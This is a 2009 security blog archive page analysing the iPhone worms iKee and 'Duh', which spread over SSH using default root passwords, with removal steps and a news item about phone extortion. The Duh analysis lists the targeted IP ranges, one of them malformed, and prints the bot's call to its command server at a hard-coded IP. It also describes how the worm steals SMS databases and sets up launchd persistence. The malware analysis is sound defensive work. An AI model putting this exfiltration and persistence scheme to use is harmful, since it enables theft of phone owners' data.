Archive

Archive for November, 2009

2010 Security Outlook

In 2009, many in IT industry lost jobs because of the tremendous pressure to cut-cost – so companies could go through and survive the recession. However, not everything in IT were gloomy, IT services that are aligned to cost-reductions and value creation such as implementing virtualization, SaaS and cloud services are on the rise – and they are expected to grow in the coming year.

Because we’ve been in a difficult situation, where IT companies are expected to cut cost, maintain customers and at the same time, expected to adopt in changing market opportunity, many of us worked in survival mode. This provides opportunities for organized cyber criminals to take more steps in becoming sophisticated and expanding capabilities.

From Gartner futuristic security scenarios, “Perpetual Arm Race” is very close to what we have encountered this year, which I believe will continue in the next couple of years.

This is a perpetual fight where success changes sides. Hackers, cybercriminals, and criminal consortia invent and launch relentless and powerful attacks on enterprises and individuals. Enterprises and vendors relentlessly work on advancing protective measures, launch pre-emptive actions against hackers, and apply law and technology. Advanced technology laboratories exist inside vendors’ facilities, as well as inside criminal structures. Web business functions decently, but all necessary security precautions are taken.

Although, the “Security Nirvana” scenario is a good direction we look forward to.

The “good guys” prevail over the “bad guys.” Enterprises’ and vendors’ security specialists are always a few steps ahead of hackers. Security measures have created an impeccable shield around enterprises. Procured and subscribed software is “security bug-free.” This is a world without the fear of hackers. The entire world is happily and securely interconnected.

Yet another glorified bad behavior

“The author of the first iPhone worm “iKee” has been given a job with Australian iPhone app developer Mogeneration” [Read SC]

We’ve heard similar story early this year when the author of Twitter worm “Mikkey” landed a job  at exqSoft Solutions.

“adolescents engage in bad behaviour because they find benefits — such as the immediate gratification of peer acceptance — are worth the risks.”  as published in journal Psychological Science.

This trend tends to justify that crimes in the public interest are not prosecuted but instead glorified?

Analysis of “Duh”

I just published the analysis of “Duh” also known as “iKee.b” – the latest iPhone worm. [read]

Propagation: It targets jailbroken iPhones with SSH enabled and attempt to remote login using the default iPhone password. “sshd” is responsible for scanning the network and it’s targeting pre-defined list of 3G providers in Australia, Netherlands,  Austria, Hungary and Portugal.

192.168.0.0-192.168.3.255
94.157.100.0-94.157.255.255
87.103.52.255-87.103.66.255
94.157.0.0.0-120.157.99.255
114.72.0.0-114.75.255.255
92.248.90.0-92.248.120.255
81.217.74.0-81.217.74.255
84.224.60.0-84.224.80.255
188.88.100.0-188.88.160.255
77.248.140.0-77.248.146.255
77.54.160.0-77.54.190.255
80.57.116.0-80.57.131.255
84.224.0.0-84.224.63.255

• Installation: It creates /private/var/mobile/home directory, drops “cydia.tgz” and extracts the following content:

syslog – This is a reporting bot, which runs every 5 minutes through a launchd job.  It’s a shell script which will perform the following:

• Establish remote server communication through its own http communicator “duh”

/private/var/mobile/home/duh 92.61.38.16 /xml/p.php?id=$ID

• The remote server is expected to reply where the worm will attempt to store this as a temporary file /private/var/mobile/home/.tmp
• It will mark the communication 1 if it is the first time, otherwise it’s 2.
• It then adds this information to the temporary file and saves it as /private/var/mobile/home/heh, where it will execute it as a shell script.

inst –  A malicious shell script used to install the worm. This is executed after the content of cydia.tgz is extracted.

• It checks for infection marker, to avoid re-installation. This is necessary because the worm will continuously run in background based on the launchd jobs.
• Create ID that will be used to pass communication to the master server.
• Install legitimate packages that will be used to gather and steal information
• Modify root password
• Gather important information such as iPhone OS version and SMS Message Database (sms.db).
• Compress gathered information to this format {ID}.tgz
• Establish a communication to remote server and reports back the stolen information in a base64 encoded format.

duh – This is an iPhone executable file responsible for the Worm’s bot http communication. This is where the malware name “Duh” was derived.

**Updated 11/12/2009:  A good analysis was recently published @ Fortinet’s blog. As I mentioned this worm is similar to OSX Jahlav and DNSChanger, in which the group behind mostly copy exact source code (around the internet) and uses it for their own advantage.  In this case,  Fortinet researcher found that “duh” code is similar to “htmlget.c”, which can be easily found over the internet and it is indeed  NOT malicious by itself.

I absolutely agree in this findings, however similar to “NC” (netcat utility), it could be use for good but in this specific case of the iPhone worm package, it was used to do evil 😉

curl_7.19.4-6_iphoneos_arm.deb – This is a legitimate package of Curl for iPhone, used by this worm to install the following packages:
• adv-cmds_119-5_iphoneos-arm.deb
• sqlite3_3.5.9-9_iphoneos-arm.deb

com.apple.period.plist – This is a launchd job which will execute the worm’s bot “syslog” every 5 minutes.

• Startup Entries: The worm uses LaunchDaemon to run a shell script on a specific time interval:
/System/Library/LaunchDaemons/com.apple.periodic.plist launch /private/var/mobile/home/syslog every 2000 sec. (~ 33 minutes)
/System/Library/LaunchDaemons/com.apple.period.plist launch /private/var/mobile/home/syslog every 300 sec. (5 minutes)
/System/Library/LaunchDaemons/com.apple.ksyslog.plist launch /private/var/mobile/home/sshd using “RunAtLoad” and “KeepAlive” key for continuous running.

New iPhone Worm

Mikko of F-Secure blogged about a new iPhone worm that is similar to iKee, only this time, it has a reporting bot capability communicating to a web-based C&C.

This has been confirmed by xs4all.

Further reading – Malicious iPhone Worm.

iPhone worm “iKee”

Name: Worm iKee

Author: ike_x

Location: Sydney, Australia

Discovered: November 6, 2009 – Friday at 12:15 pm by sierralpha @ whirlpool forum

Report details: 3GS 16gb
Os 3.1.2 (7D11) on OPTUS
Jailbroken with Blackra1n
Running Cydia, Winterboard and Installous

Description:

Worm iKee targets jailbroken iPhones and takes advantage of SSH service that uses default password to allow remote user logins.

From an interview by JD, the author explains:

As for users that are infected, there are two common denominator – They all have hacked iPhones

(known to the hacking community as “JailBroken”, and they all use an SSH Daemon, allowing users

to connect to their phone’s remotely, and attempt to login.

Worm Propagation Method: SSH service using default password

Author recommendation:

Users that have already “JailBroken” their iPhones, should immediately change the root account password, even if they have not installed an SSH Daemon.

Worm Behaviour:

– iKee overwrites Cydia files with its working code

“Cydia is a replacement packaging and repository manager for the original Installer.app for the iPhone or iPod touch”

– Changes iPhone owners’ wallpaper and replaces it with a photo that is known from a cross platform joke “RICKROLL” (I remember, I captured a video and uploaded in YouTube)  “Never Gonna Give You Up” by Rick Astley.

– Deletes SSH Daemon

– It scan pre-defined IP addresses to infect and spread to another vulnerable iPhone user (All

IP addresses belong to 3G customers in Australia and are hardcoded in the worm by SANS diary)

ikee-iphone-wallpaper.jpgImage source: forums.whirlpool.net.au “iKee changes infected iPhone user’s wallpaper”

How to remove iKee:

The author explained (from JD’s interview) that there are 4 variants of this worm, and here’s how to remove them:

Variants A-C store files in these directories, so you have to remove them (may use rm in terminal)

/bin/poc-bbot

/bin/sshpass

/var/log/youcanbeclosertogod.jpg

/var/mobile/LockBackground.jpg

/System/Library/LaunchDaemons/com.ikey.bbot.plis

/var/lock/bbot.lock

Then, reboot the phone and change your password and re-install SSH.

For variant D, remove the following files in these directories:

/usr/libexec/cydia/startup

/usr/libexec/cydia/startup.so

/usr/libexec/cydia/startup-helper

/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist

Reinstall Cydia.

Remember to change your root password!

Follow this instruction.

Your iPhone’s been hacked…€5 to unlock

Dutch hacker holds jailbroken iPhones “hostage” for €5 – Source: Ars Technica [read]

jailbroken_iphone_hacked_intro.jpg

It appears one enterprising Dutch hacker used port scanning to identify jailbroken iPhones on T-mobile Netherlands with SSH running. Enabling SSH is a common procedure for jailbroken iPhones, allowing a user to log in via Terminal and run standard UNIX commands. Unfortunately, iPhones all have a default root password that many forget to change after jailbreaking, leaving their phone as vulnerable as a Lamborghini parked on a public street with the windows down, the doors unlocked, and the keys in the ignition.

The hacker relied on unchanged root passwords to hack into the phones. He then sent what appears to be an SMS alert to the hacked phones that read, “You iPhone’s been hacked because it’s really insecure! Please visit doiop.com/iHacked and secure your iPhone right now! Right now, I can access all your files.” Going to the website directs the user to send €5 to a PayPal account, after which the hacker will e-mail instructions to remove the hack—which most likely involve restoring the iPhone to factory settings.